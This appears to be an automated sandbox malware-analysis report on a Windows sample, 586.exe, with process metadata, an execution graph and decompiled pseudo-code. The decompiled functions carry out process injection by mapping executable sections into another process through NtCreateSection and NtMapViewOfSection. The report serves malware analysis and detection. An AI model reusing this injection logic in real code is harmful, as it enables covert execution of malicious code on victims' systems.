                  Path:C:\Users\user\AppData\Local\Temp\586.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\586.exe
                  Imagebase:0x400000
                  File size:610304 bytes
                  MD5 hash:5C3FAFBD0E6546D41F902B129CE27E7B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.4%
                    Dynamic/Decrypted Code Coverage:45%
                    Signature Coverage:17.8%
                    Total number of Nodes:202
                    Total number of Limit Nodes:7
                    execution_graph 8844 411b01 8847 411975 8844->8847 8848 411989 _LocaleUpdate::_LocaleUpdate 8847->8848 8855 415461 8848->8855 8850 411995 8851 4119a9 8850->8851 8859 41531e 8850->8859 8853 415461 __forcdecpt_l RtlAllocateHeap 8851->8853 8854 4119b2 8853->8854 8856 41547f 8855->8856 8857 41546f 8855->8857 8864 41534c 8856->8864 8857->8850 8860 41532c 8859->8860 8861 41533e 8859->8861 8860->8850 8881 4152cd 8861->8881 8865 415361 _LocaleUpdate::_LocaleUpdate 8864->8865 8866 41536d 8865->8866 8868 4153c1 __isleadbyte_l 8865->8868 8867 4126f4 __isctype_l RtlAllocateHeap 8866->8867 8869 415385 8866->8869 8867->8869 8871 4148b5 8868->8871 8869->8857 8872 4148c8 _LocaleUpdate::_LocaleUpdate 8871->8872 8875 414510 8872->8875 8874 4148e8 8874->8869 8876 414531 ___ansicp 8875->8876 8877 415bd5 ___convertcp RtlAllocateHeap 8876->8877 8880 4145a6 __freea 8876->8880 8878 41479d 8877->8878 8879 415bd5 ___convertcp RtlAllocateHeap 8878->8879 8878->8880 8879->8880 8880->8874 8882 4152e0 _LocaleUpdate::_LocaleUpdate 8881->8882 8883 4152fa 8882->8883 8884 4126f4 __isctype_l RtlAllocateHeap 8882->8884 8883->8850 8884->8883 8775 600001 8776 600005 8775->8776 8781 60092b GetPEB 8776->8781 8778 600030 8783 60003c 8778->8783 8782 600972 8781->8782 8782->8778 8784 600049 8783->8784 8785 600e0f 2 API calls 8784->8785 8786 600223 8785->8786 8787 600d90 GetPEB 8786->8787 8788 600238 VirtualAlloc 8787->8788 8789 600265 8788->8789 8790 6002ce VirtualProtect 8789->8790 8792 60030b 8790->8792 8791 600439 VirtualFree 8795 6004be LoadLibraryA 8791->8795 8792->8791 8794 6008c7 8795->8794 8817 40c182 8818 41065a __calloc_crt RtlAllocateHeap 8817->8818 8819 40c18e 8818->8819 8802 600005 8803 60092b GetPEB 8802->8803 8804 600030 8803->8804 8805 60003c 7 API calls 8804->8805 8806 600038 8805->8806 8885 40ffc5 8887 40ffec 8885->8887 8886 4143c0 ___crtGetStringTypeA RtlAllocateHeap 8888 410066 8886->8888 8887->8886 8891 4100ab 8887->8891 8889 4148b5 ___crtLCMapStringA RtlAllocateHeap 8888->8889 8890 410086 8889->8890 8892 4148b5 ___crtLCMapStringA RtlAllocateHeap 8890->8892 8892->8891 8681 401446 8682 40144c 8681->8682 8683 4014d8 NtDuplicateObject 8682->8683 8685 4015f4 8682->8685 8684 4014f5 NtCreateSection 8683->8684 8683->8685 8686 401575 NtCreateSection 8684->8686 8687 40151b NtMapViewOfSection 8684->8687 8686->8685 8689 4015a1 8686->8689 8687->8686 8688 40153e NtMapViewOfSection 8687->8688 8688->8686 8690 40155c 8688->8690 8689->8685 8691 4015ab NtMapViewOfSection 8689->8691 8690->8686 8691->8685 8692 4015d2 NtMapViewOfSection 8691->8692 8692->8685 8813 4029c8 8815 402997 8813->8815 8814 4017f4 8 API calls 8816 402b73 8814->8816 8815->8813 8815->8814 8815->8816 8624 40c96a 8625 40c977 ___initmbctable 8624->8625 8628 40c985 8625->8628 8630 41065a 8625->8630 8627 41065a __calloc_crt RtlAllocateHeap 8629 40c9ac 8627->8629 8629->8627 8629->8628 8633 410663 8630->8633 8632 4106a0 8632->8629 8633->8632 8634 4148fa 8633->8634 8635 414906 __lock ___sbh_alloc_block __msize __calloc_impl 8634->8635 8636 4149af RtlAllocateHeap 8635->8636 8637 41491e __msize 8635->8637 8636->8635 8637->8633 8638 402aea 8640 402ad8 8638->8640 8639 402b73 8640->8639 8642 4017f4 8640->8642 8643 401805 8642->8643 8644 40182d Sleep 8643->8644 8645 401848 8644->8645 8647 401859 8645->8647 8648 40143b 8645->8648 8647->8639 8649 40144c 8648->8649 8650 4014d8 NtDuplicateObject 8649->8650 8652 4015f4 8649->8652 8651 4014f5 NtCreateSection 8650->8651 8650->8652 8653 401575 NtCreateSection 8651->8653 8654 40151b NtMapViewOfSection 8651->8654 8653->8652 8656 4015a1 8653->8656 8654->8653 8655 40153e NtMapViewOfSection 8654->8655 8655->8653 8657 40155c 8655->8657 8656->8652 8658 4015ab NtMapViewOfSection 8656->8658 8657->8653 8658->8652 8659 4015d2 NtMapViewOfSection 8658->8659 8659->8652 8820 40b68b 8821 40b6a4 8820->8821 8824 40b45c 8821->8824 8825 40b471 _LocaleUpdate::_LocaleUpdate 8824->8825 8827 40b483 8825->8827 8828 4126f4 8825->8828 8830 412708 __isleadbyte_l _LocaleUpdate::_LocaleUpdate 8828->8830 8829 412715 8829->8825 8830->8829 8832 4143c0 8830->8832 8833 4143d3 _LocaleUpdate::_LocaleUpdate 8832->8833 8836 414206 8833->8836 8835 4143f0 8835->8829 8837 414227 ___ansicp 8836->8837 8839 41423f __freea 8837->8839 8840 415bd5 8837->8840 8839->8835 8841 415c9f __freea 8840->8841 8842 415c15 8840->8842 8841->8839 8842->8841 8843 41065a __calloc_crt RtlAllocateHeap 8842->8843 8843->8841 8606 6567b4 8609 6567c5 8606->8609 8610 6567d4 8609->8610 8613 656f65 8610->8613 8618 656f80 8613->8618 8614 656f89 CreateToolhelp32Snapshot 8615 656fa5 Module32First 8614->8615 8614->8618 8616 656fb4 8615->8616 8617 6567c4 8615->8617 8620 656c24 8616->8620 8618->8614 8618->8615 8621 656c4f 8620->8621 8622 656c60 VirtualAlloc 8621->8622 8623 656c98 8621->8623 8622->8623 8623->8623 8807 40a554 8808 40a560 __msize 8807->8808 8809 41065a __calloc_crt RtlAllocateHeap 8808->8809 8812 40a581 8809->8812 8810 40a669 ___lock_fhandle __msize 8811 41065a __calloc_crt RtlAllocateHeap 8811->8812 8812->8810 8812->8811 8660 60003c 8661 600049 8660->8661 8673 600e0f SetErrorMode SetErrorMode 8661->8673 8666 600265 8667 6002ce VirtualProtect 8666->8667 8669 60030b 8667->8669 8668 600439 VirtualFree 8672 6004be LoadLibraryA 8668->8672 8669->8668 8671 6008c7 8672->8671 8674 600223 8673->8674 8675 600d90 8674->8675 8676 600dad 8675->8676 8677 600dbb GetPEB 8676->8677 8678 600238 VirtualAlloc 8676->8678 8677->8678 8678->8666 8729 40907c 8732 40909e __fassign 8729->8732 8731 4090b2 8732->8731 8738 40928e 8732->8738 8739 4111c9 8732->8739 8735 4111c9 __fassign RtlAllocateHeap 8736 4092a7 8735->8736 8737 4111c9 __fassign RtlAllocateHeap 8736->8737 8736->8738 8737->8738 8738->8731 8742 410f7e 8738->8742 8745 410f9e 8739->8745 8757 410eb2 8742->8757 8744 410f99 8744->8731 8746 410fb2 _LocaleUpdate::_LocaleUpdate 8745->8746 8747 409287 8746->8747 8749 41522c 8746->8749 8747->8735 8747->8738 8750 41523c 8749->8750 8752 415241 8750->8752 8753 41513a 8750->8753 8752->8747 8755 415160 ___ascii_strnicmp 8753->8755 8756 415150 _LocaleUpdate::_LocaleUpdate 8753->8756 8754 41534c RtlAllocateHeap __tolower_l 8754->8756 8755->8752 8756->8754 8756->8755 8758 410ebe __msize 8757->8758 8760 410ed1 __msize __sopen_helper 8758->8760 8761 410793 8758->8761 8760->8744 8762 4107b8 __get_daylight 8761->8762 8764 41081c 8 library calls 8762->8764 8765 413281 8762->8765 8764->8760 8768 41328d __lock ___lock_fhandle __alloc_osfhnd __msize __mtinitlocknum 8765->8768 8766 41065a __calloc_crt RtlAllocateHeap 8767 4132a2 ___lock_fhandle __alloc_osfhnd __msize 8766->8767 8767->8764 8768->8766 8768->8767 8679 40ce1f HeapCreate 8680 40ce43 8679->8680 8769 40181f 8770 401828 8769->8770 8771 40182d Sleep 8770->8771 8772 401848 8771->8772 8773 40143b 7 API calls 8772->8773 8774 401859 8772->8774 8773->8774

                    Executed Functions

                    Function 0040143B Relevance: 10.7, APIs: 7, Instructions: 189nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 85 40143b-401444 86 40145b 85->86 87 40144c-401457 85->87 86->87 88 40145e-401482 call 401134 86->88 87->88 94 401484 88->94 95 401487-40148c 88->95 94->95 97 4017b2-4017ba 95->97 98 401492-4014a3 95->98 97->95 101 4017b0-4017d3 98->101 102 4014a9-4014d2 98->102 109 4017e5 101->109 102->101 110 4014d8-4014ef NtDuplicateObject 102->110 110->101 111 4014f5-401519 NtCreateSection 110->111 114 401575-40159b NtCreateSection 111->114 115 40151b-40153c NtMapViewOfSection 111->115 114->101 118 4015a1-4015a5 114->118 115->114 117 40153e-40155a NtMapViewOfSection 115->117 117->114 119 40155c-401572 117->119 118->101 120 4015ab-4015cc NtMapViewOfSection 118->120 119->114 120->101 121 4015d2-4015ee NtMapViewOfSection 120->121 121->101 123 4015f4 call 4015f9 121->123
                    C-Code - Quality: 54%
                    			E0040143B(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __edi;
				void* __ebp;
				intOrPtr _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr* _t108;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				long* _t129;
				signed int _t136;
				int _t137;
				intOrPtr _t154;
				void* _t159;
				intOrPtr* _t160;
				void* _t163;
				void* _t170;
				long _t171;
				intOrPtr _t172;
				void* _t173;
				long* _t178;
				intOrPtr* _t179;
				HANDLE* _t180;
				HANDLE* _t181;
				void* _t186;
				void* _t187;
				intOrPtr* _t190;
				void* _t191;
				intOrPtr _t194;
				intOrPtr* _t195;
				void* _t196;
				void* _t197;
				intOrPtr* _t198;
				long _t216;
				void* _t222;

				_push(0x1474);
				_t84 =  *_t195;
				_t196 = _t195 + 4;
				E00401134(_t84, _t170, __eflags, _t222);
				_t126 = _a4;
				_t171 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t178 =  &_v100;
				 *_t178 = _t171;
				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t178);
				_t90 =  *_t178;
				if(_t90 != 0) {
					_t129 =  &_v52;
					 *_t129 = _t90;
					_t129[1] = _t171;
					_t179 =  &_v44;
					 *((intOrPtr*)(_t126 + 0x10))(_t179, 0x18);
					 *_t179 = 0x18;
					_push( &_v52);
					_push(_t179);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t171, _t171, 2) == 0) {
						_v12 = _t171;
						_t98 =  &_v84;
						 *(_t98 + 4) = _t171;
						 *_t98 = 0x5000;
						_t180 =  &_v88;
						if(NtCreateSection(_t180, 6, _t171, _t98, 4, 0x8000000, _t171) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t120 =  &_v72;
							 *_t120 = _t171;
							if(NtMapViewOfSection( *_t180, 0xffffffff, _t120, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
								_t122 =  &_v64;
								 *_t122 = _t171;
								if(NtMapViewOfSection( *_t180, _v16, _t122, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
									_t194 = _v72;
									 *((intOrPtr*)(_t126 + 0x20))(_t171, _t194, 0x104);
									 *((intOrPtr*)(_t194 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t100 =  &_v84;
						 *(_t100 + 4) = _t171;
						 *_t100 = _a12 + 0x10000;
						_t181 =  &_v92;
						if(NtCreateSection(_t181, 0xe, _t171, _t100, 0x40, 0x8000000, _t171) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t102 =  &_v76;
							 *_t102 = _t171;
							if(NtMapViewOfSection( *_t181, 0xffffffff, _t102, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
								_t104 =  &_v68;
								 *_t104 = _t171;
								_t216 = NtMapViewOfSection( *_t181, _v16, _t104, _t171, _t171, _t171,  &_v60, 1, _t171, 0x20);
								if(_t216 == 0) {
									L21();
									if(_t216 == 0 && _t216 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t197 = _t196 + 4;
									_push(0x2eb0);
									_t198 = _t197 + 4;
									_push(0x2260);
									_t154 =  *_t198;
									_push(_t154);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t186 = _a8 +  *_a8;
									_t136 =  *(_t186 + 6) & 0x0000ffff;
									_push(_t186);
									_t159 = _t186;
									if(_v56 == 0) {
										_t160 = _t159 + 0xf8;
										__eflags = _t160;
									} else {
										_t160 = _t159 + 0x108;
									}
									_push(_t136);
									_t137 =  *(_t160 + 0x10);
									if(_t137 != 0) {
										memcpy( *((intOrPtr*)(_t160 + 0xc)) + _v76,  *((intOrPtr*)(_t160 + 0x14)) + _a8, _t137);
									}
									asm("loop 0xffffffe6");
									_pop(_t187);
									if(_v56 == 0) {
										_push(_t187);
										_t163 =  *((intOrPtr*)(_t187 + 0x34)) - _v68;
										_t190 =  *((intOrPtr*)(_t187 + 0xa0)) + _v76;
										__eflags = _t190;
										while(1) {
											__eflags =  *_t190;
											if( *_t190 == 0) {
												break;
											}
											_t172 =  *_t190;
											_t190 = _t190 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t163;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t172));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t191);
										_t171 = 0;
										__eflags = 0;
										_t108 =  &_v8;
										 *_t108 = 0;
										 *((intOrPtr*)(_t126 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t191 + 0x28)) + _v68, _v64, _t108, 0);
									} else {
										L54();
										_pop(_t173);
										_t171 = _t173 - 0x16ee;
										 *((intOrPtr*)(_t171 + 0x1722)) = _t171 + 0x2bbb;
										L004011C3();
										0x33(_t171 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t171 + 0x1747)) = _t171 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x1474;
				_push(0x379);
			}




























































                    0x0040144c
                    0x00401451
                    0x00401454
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151b
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ab
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: a1a548987cee5af6a20eaada0c048d68b1c52e2eb5f25007b876aabe9c92dcad
                    • Instruction ID: a241dfb1a7147892ad06c72b7904183168c99d91159797a80032ec6269488466
                    • Opcode Fuzzy Hash: a1a548987cee5af6a20eaada0c048d68b1c52e2eb5f25007b876aabe9c92dcad
                    • Instruction Fuzzy Hash: E2513F74900209BFEB208F91CC89FAF7BB8EF85B50F10412AF911BA1E5D7749941CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401446 Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 125 401446-401482 call 401134 133 401484 125->133 134 401487-40148c 125->134 133->134 136 4017b2-4017ba 134->136 137 401492-4014a3 134->137 136->134 140 4017b0-4017d3 137->140 141 4014a9-4014d2 137->141 148 4017e5 140->148 141->140 149 4014d8-4014ef NtDuplicateObject 141->149 149->140 150 4014f5-401519 NtCreateSection 149->150 153 401575-40159b NtCreateSection 150->153 154 40151b-40153c NtMapViewOfSection 150->154 153->140 157 4015a1-4015a5 153->157 154->153 156 40153e-40155a NtMapViewOfSection 154->156 156->153 158 40155c-401572 156->158 157->140 159 4015ab-4015cc NtMapViewOfSection 157->159 158->153 159->140 160 4015d2-4015ee NtMapViewOfSection 159->160 160->140 162 4015f4 call 4015f9 160->162
                    C-Code - Quality: 56%
                    			E00401446(void* __eax, void* __edi) {
				intOrPtr _t85;
				intOrPtr _t88;
				long _t91;
				void* _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				long* _t131;
				signed int _t138;
				int _t139;
				intOrPtr _t156;
				void* _t161;
				intOrPtr* _t162;
				void* _t165;
				long _t173;
				intOrPtr _t175;
				void* _t176;
				long* _t181;
				intOrPtr* _t183;
				HANDLE* _t184;
				HANDLE* _t185;
				void* _t190;
				void* _t191;
				intOrPtr* _t194;
				void* _t195;
				void* _t198;
				void* _t199;
				intOrPtr* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t209;
				long _t223;
				void* _t229;

				asm("sbb bh, [edx]");
				_t209 = __eax - 0x78;
				asm("int 0xaa");
				_push(0x1474);
				_t85 =  *_t201;
				_t202 = _t201 + 4;
				E00401134(_t85, __edi, _t209, _t229);
				_t127 =  *((intOrPtr*)(_t199 + 8));
				_t173 = 0;
				 *((intOrPtr*)(_t199 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t199 - 0x34)) =  *((intOrPtr*)(_t199 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t199 - 0x5c)) = _t88;
				_t181 = _t199 - 0x60;
				 *_t181 = _t173;
				 *((intOrPtr*)(_t127 + 0x4c))(_t88, _t181);
				_t91 =  *_t181;
				if(_t91 != 0) {
					_t131 = _t199 - 0x30;
					 *_t131 = _t91;
					_t131[1] = _t173;
					_t183 = _t199 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t183, 0x18);
					 *_t183 = 0x18;
					_push(_t199 - 0x30);
					_push(_t183);
					_push(0x40);
					_push(_t199 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t199 - 0x10), 0xffffffff, 0xffffffff, _t199 - 0xc, _t173, _t173, 2) == 0) {
						 *(_t199 - 8) = _t173;
						_t99 = _t199 - 0x50;
						 *(_t99 + 4) = _t173;
						 *_t99 = 0x5000;
						_t184 = _t199 - 0x54;
						if(NtCreateSection(_t184, 6, _t173, _t99, 4, 0x8000000, _t173) == 0) {
							 *_t25 =  *(_t199 - 0x50);
							_t121 = _t199 - 0x44;
							 *_t121 = _t173;
							if(NtMapViewOfSection( *_t184, 0xffffffff, _t121, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
								_t123 = _t199 - 0x3c;
								 *_t123 = _t173;
								if(NtMapViewOfSection( *_t184,  *(_t199 - 0xc), _t123, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
									_t198 =  *(_t199 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t173, _t198, 0x104);
									 *((intOrPtr*)(_t198 + 0x208)) =  *((intOrPtr*)(_t199 + 0x14));
									 *(_t199 - 8) =  *(_t199 - 8) + 1;
								}
							}
						}
						_t101 = _t199 - 0x50;
						 *(_t101 + 4) = _t173;
						 *_t101 =  *((intOrPtr*)(_t199 + 0x10)) + 0x10000;
						_t185 = _t199 - 0x58;
						if(NtCreateSection(_t185, 0xe, _t173, _t101, 0x40, 0x8000000, _t173) == 0 &&  *(_t199 - 8) != 0) {
							 *_t46 =  *(_t199 - 0x50);
							_t103 = _t199 - 0x48;
							 *_t103 = _t173;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t103, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
								_t105 = _t199 - 0x40;
								 *_t105 = _t173;
								_t223 = NtMapViewOfSection( *_t185,  *(_t199 - 0xc), _t105, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 0x20);
								if(_t223 == 0) {
									L20();
									if(_t223 == 0 && _t223 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t204 = _t202 + 4;
									_push(0x2eb0);
									_t205 = _t204 + 4;
									_push(0x2260);
									_t156 =  *_t205;
									_push(_t156);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t190 =  *((intOrPtr*)(_t199 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0xc))));
									_t138 =  *(_t190 + 6) & 0x0000ffff;
									_push(_t190);
									_t161 = _t190;
									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
										_t162 = _t161 + 0xf8;
										__eflags = _t162;
									} else {
										_t162 = _t161 + 0x108;
									}
									_push(_t138);
									_t139 =  *(_t162 + 0x10);
									if(_t139 != 0) {
										memcpy( *((intOrPtr*)(_t162 + 0xc)) +  *(_t199 - 0x48),  *((intOrPtr*)(_t162 + 0x14)) +  *((intOrPtr*)(_t199 + 0xc)), _t139);
									}
									asm("loop 0xffffffe6");
									_pop(_t191);
									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
										_push(_t191);
										_t165 =  *((intOrPtr*)(_t191 + 0x34)) -  *(_t199 - 0x40);
										_t194 =  *((intOrPtr*)(_t191 + 0xa0)) +  *(_t199 - 0x48);
										__eflags = _t194;
										while(1) {
											__eflags =  *_t194;
											if( *_t194 == 0) {
												break;
											}
											_t175 =  *_t194;
											_t194 = _t194 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t165;
												__eflags =  *((intOrPtr*)(0 +  *(_t199 - 0x48) + _t175));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t195);
										_t173 = 0;
										__eflags = 0;
										_t109 = _t199 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t199 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t195 + 0x28)) +  *(_t199 - 0x40),  *(_t199 - 0x3c), _t109, 0);
									} else {
										L53();
										_pop(_t176);
										_t173 = _t176 - 0x16ee;
										 *((intOrPtr*)(_t173 + 0x1722)) = _t173 + 0x2bbb;
										L004011C3();
										0x33(_t173 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t173 + 0x1747)) = _t173 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t92 = 0x1474;
				_push(0x379);
			}










































                    0x00401446
                    0x00401448
                    0x0040144a
                    0x0040144c
                    0x00401451
                    0x00401454
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
